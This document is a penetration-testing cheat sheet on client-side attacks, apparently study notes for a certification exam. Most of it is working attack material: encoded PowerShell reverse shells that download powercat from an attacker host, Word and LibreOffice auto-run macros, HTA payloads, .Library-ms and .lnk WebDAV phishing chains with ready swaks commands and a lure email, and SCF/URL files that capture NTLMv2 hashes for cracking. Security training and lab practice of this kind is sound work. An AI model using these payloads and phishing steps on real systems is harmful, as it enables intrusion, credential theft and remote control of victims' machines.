Client-Side Attacks Reference
Decision Tree
Can you send email to target?
├── YES → Word Macro (.doc) or Library File (.library-ms) + .lnk
│ └── SMTP server available? → deliver with swaks
└── NO
├── Writable SMB share?
│ └── YES → Drop SCF/URL file → capture NTLMv2 hash → crack
└── Can victim visit a URL?
└── YES → HTA file hosted on your server
With assumed-breach format, client-side is less likely on exam. But know it for standalone boxes.
Quick Reference: What attack do I use?
| I have… | Attack | Build with | Deliver with |
|---|---|---|---|
| SMTP + emails + Windows box | Library-ms + .lnk | text editor + Windows GUI | swaks |
| SMTP + emails (no Windows) | Word macro .doc | LibreOffice | swaks |
| Web upload form | ODT macro | LibreOffice GUI | upload form |
| Writable SMB share | SCF/URL file | text editor | drop in share + Responder |
| Victim visits your URL | HTA file | text editor | python3 http.server |
Word VBA Macro Attack
Step 1 — Generate Encoded Reverse Shell
# Encode PowerShell payload (UTF-16LE + Base64 — required for -enc flag)
python3 -c "
import base64,sys
cmd = sys.argv[1]
print(base64.b64encode(cmd.encode('utf-16-le')).decode())
" "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKER/powercat.ps1');powercat -c ATTACKER -p 443 -e powershell"
Step 2 — Create Macro in Word
View → Macros → Create:
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = "powershell.exe -nop -w hidden -enc "
Str = Str + "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUA..." ' chunk 1
Str = Str + "YwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdA..." ' chunk 2
CreateObject("Wscript.Shell").Run Str
End Sub
⚠️ Save as .doc (Word 97-2003) — NOT .docx (macros won’t persist).
Python script to split base64 into VBA-safe 50-char chunks:
import sys
str = sys.argv[1] # pass the base64 string as argument
n = 50
for i in range(0, len(str), n):
print('Str = Str + "' + str[i:i+n] + '"')
# Usage: python3 split.py <BASE64_STRING>
# Paste output into the macro between the Str = "powershell..." line and CreateObject
Step 3 — Deliver
# Host PowerCat
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 80
# Listener
nc -nlvp 443
Windows Library File Attack (.library-ms)
Creates a fake library pointing to your WebDAV server. Victim opens it, Explorer connects, they see your malicious .lnk shortcut.
Step 1 — WebDAV Server
pip3 install wsgidav
mkdir ~/webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ~/webdav
Step 2 — Create Library File
Save as config.Library-ms:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<n>@windows.storage.dll,-34582</n>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://ATTACKER_IP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Step 3 — Create Malicious Shortcut (.lnk)
On Windows (RDP), right-click Desktop > New > Shortcut. Use the SHORT powercat target (see full section below for why):
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://$KALI:8000/powercat.ps1'); powercat -c $KALI -p 4445 -e powershell"
Step 4 — Deliver via Email
swaks = SMTP Swiss Army Knife. Sends emails from command line.
# FIRST — test if email delivers (no attachment, just a test)
sudo swaks -t [email protected] --from [email protected] --server MAIL_IP --body "test" --header "Subject: test"
# Reading output:
# RCPT TO -> 250 OK = email DELIVERED
# RCPT TO -> 550 Unknown = rejected — try adding auth below
# If 550 — add SMTP authentication
sudo swaks -t [email protected] --from [email protected] --server MAIL_IP --body "test" --header "Subject: test" -ap -au SMTP_USER -ap SMTP_PASS
# swaks flags:
# -t = TO (recipient)
# --from = FROM (sender address)
# --server = mail server IP
# -ap = enable SMTP authentication
# -au = auth username (SMTP login — NOT necessarily the sender)
# -ap = auth password (found in config files, git repos, databases)
# --attach @ = attach a file (@ means read from file path)
# --body @ = email body from file (@ means read from file path)
# --suppress-data = cleaner output
# REAL phishing email (after test works)
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server MAIL_IP --body @body.txt --header "Subject: Staging Script" --suppress-data -ap -au SMTP_USER -ap SMTP_PASS
How to recognize SMTP credentials:
- Found in config files with words like “email configuration”, “smtp”, “mail server”
- Person mentioned as “contact” or “responsible” = phishing TARGET, not sender
LibreOffice ODT Macro Attack
Same concept as Word macros but for ODT documents. Use when upload forms accept ODT/document files and the server “reviews” or processes them automatically.
Step-by-step:
# 1. Create reverse shell script on Kali
cat > /home/kali/shell.ps1 << 'EOF'
$client = New-Object System.Net.Sockets.TCPClient("ATTACKER",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
EOF
# 2. Open LibreOffice
libreoffice --writer
Inside LibreOffice:
- Type fake content, File → Save As →
resume.odt(MUST save first) - Tools → Macros → Edit Macros
- In left panel, expand resume.odt → Standard → Module1 (NOT “My Macros”)
- Paste macro:
Sub Main
Shell("cmd.exe /c powershell IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')")
End Sub
- Ctrl+S to save
- Tools → Customize → Events tab
- Change “Save in:” dropdown to resume.odt (NOT LibreOffice)
- Select Open Document → click Macro… → select resume.odt → Standard → Module1 → Main
- OK → OK → Ctrl+S again
Deploy:
# Terminal 1: serve shell.ps1
python3 -m http.server 80
# Terminal 2: listener
rlwrap nc -lvnp 4444
# Upload resume.odt through web form
Critical order (will fail if wrong):
Save document → add macro to DOCUMENT → save → set event trigger with “Save in: resume.odt” → save
HTA (HTML Application) Attack
<html>
<body>
<script>
var c = "powershell.exe -nop -w hidden -enc <BASE64>";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
python3 -m http.server 80
# Victim visits: http://ATTACKER/evil.hta → browser prompts to open → shell
⚠️ msfvenom -f hta-pse counts as your ONE Metasploit use. Prefer manual HTA.
Forced Authentication via Writable Shares
Drop these files in a writable SMB share. When a user browses the share, Windows auto-loads the icon from your server → sends NTLMv2 hash.
SCF File (save as @inventory.scf — @ sorts to top)
[Shell]
Command=2
IconFile=\\ATTACKER_IP\share\icon.ico
[Taskbar]
Command=ToggleDesktop
URL File
[InternetShortcut]
URL=http://ATTACKER_IP/test
IconIndex=0
IconFile=\\ATTACKER_IP\share\icon.ico
Capture the Hash
sudo responder -I tun0 -v -A # ANALYZE mode on exam!
# Or:
impacket-smbserver share . -smb2support
Crack the Captured NTLMv2 Hash
Responder prints an [SMB] NTLMv2-SSP Hash line — save that whole line to a file and crack it (NTLMv2 cannot be passed, it must be cracked):
hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt
See Hash Types and Password Attacks for more.
Payload Encoding Quick Reference
PowerShell requires UTF-16LE encoding before Base64:
# Python one-liner
python3 -c "
import base64,sys
cmd = sys.argv[1]
print(base64.b64encode(cmd.encode('utf-16-le')).decode())
" "YOUR_POWERSHELL_COMMAND_HERE"
# Use with:
powershell.exe -nop -w hidden -enc <OUTPUT>
Windows Library + WebDAV Phishing
Use when: You have valid domain creds + SMTP access but NO shell access (no WinRM/RDP/admin). Attack sends phishing email with .Library-ms file. Victim opens it, Windows Explorer connects to your WebDAV, victim clicks malicious .lnk, reverse shell.
The Chain
Email with .Library-ms attachment
-> Victim opens .Library-ms
-> Windows Explorer connects to YOUR WebDAV share (looks like a local folder)
-> Victim sees a .lnk shortcut inside the folder
-> Victim double-clicks .lnk
-> .lnk runs PowerShell: downloads powercat.ps1 from your HTTP server
-> powercat creates reverse shell back to your Netcat listener
-> You have a shell on the victims internal workstation
Step 1: WebDAV Server on Kali (port 80)
pip install wsgidav
mkdir -p ~/webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ~/webdav/
Step 2: Create .Library-ms File
Tool: Any text editor (nano on Kali works fine). Its just XML. Save with .Library-ms extension. Save as config.Library-ms:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<n>@windows.storage.dll,-34582</n>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://KALI_IP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Save this file in your working directory (NOT in the webdav folder). This file gets emailed as an attachment, it is NOT served by WebDAV.
Step 3: Create Malicious Shortcut (.lnk)
Tool: Windows GUI only. You CANNOT create .lnk on Linux. RDP in, right-click Desktop > New > Shortcut.
WARNING: Windows shortcut target has ~260 char limit. Base64-encoded payloads WILL be truncated and fail silently.
Use the SHORT powercat version (fits in the field):
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://KALI_IP:8000/powercat.ps1'); powercat -c KALI_IP -p 4444 -e powershell"
Do NOT use -enc with long base64 strings — they get cut off and you get no error, just nothing happens.
Name it install. Transfer the .lnk into ~/webdav/ (the WebDAV root).
Step 4: Serve PowerCat (port 8000)
# Find powercat (path varies by Kali version)
find / -name powercat.ps1 2>/dev/null
# Common locations:
# /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
# /usr/share/windows-resources/powercat/powercat.ps1
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 8000
Step 5: Start Listener (port 4444)
nc -nvlp 4444
Step 6: Send Phishing Email (from Kali)
See Step 4 above for full swaks flag reference. Quick one-liners:
# Without auth (open relay)
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server MAIL_IP --body @body.txt --header "Subject: Staging Script" --suppress-data
# With auth (if above returns 550)
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server MAIL_IP --body @body.txt --header "Subject: Staging Script" --suppress-data -ap -au SMTP_USER -ap SMTP_PASS
body.txt example:
Hey!
Please install the new security features on your workstation.
Download the attached file, double-click on it, and execute
the configuration shortcut within. Thanks!
4 Terminals Running Simultaneously
| Terminal | Command | Port | Purpose |
|---|---|---|---|
| 1 | wsgidav (WebDAV) | 80 | Hosts .lnk (victim browses here) |
| 2 | python3 HTTP | 8000 | Serves powercat.ps1 |
| 3 | nc listener | 4444 | Catches reverse shell |
| 4 | swaks | – | Sends phishing email |
What goes where (easy to mix up under pressure)
| File | Created on | Lives where | How victim gets it |
|---|---|---|---|
| config.Library-ms | Kali (text editor - just XML) | Emailed as attachment via swaks | Victim opens in Explorer |
| powercat.ps1 | Kali (copy from /usr/share/powershell-empire/…) | Served by python3 http.server :8000 | .lnk downloads it automatically |
Key Points
- .Library-ms = EMAIL ATTACHMENT (not in webdav folder)
- .lnk = INSIDE webdav folder (victim sees it after opening Library file)
- WebDAV must be on port 80 (Windows Explorer expects this)
- Library file URL = your Kali IP, no trailing path
- swaks -ap = password authentication to mail server
- After shell: upload winPEAS, run SharpHound, set up Meterpreter+SOCKS for pivoting
Troubleshooting (when phishing does not work)
- Did swaks deliver? Look for “250 OK” or “250 Queued” in swaks output. If you see errors, the email was not sent.
- Try WITHOUT -ap first. Many lab mail servers are open relays. The -ap flag forces authentication which may not be needed.
- No WebDAV connections? The Library-ms URL is wrong or the email was not opened. Check the URL inside the XML matches your Kali IP exactly.
- WebDAV connects but no shell? The .lnk payload is broken. Check the powercat command, verify ports match your listener.
- Try ALL email formats: [email protected], [email protected], [email protected]
- Try ALL employees. Send to every name you found, not just one.
- Wait 1-2 minutes. Simulated users do not click instantly.
- config.Library-ms goes as swaks attachment, NOT in the webdav folder.
- Use sudo with swaks if sending on port 25 (privileged port).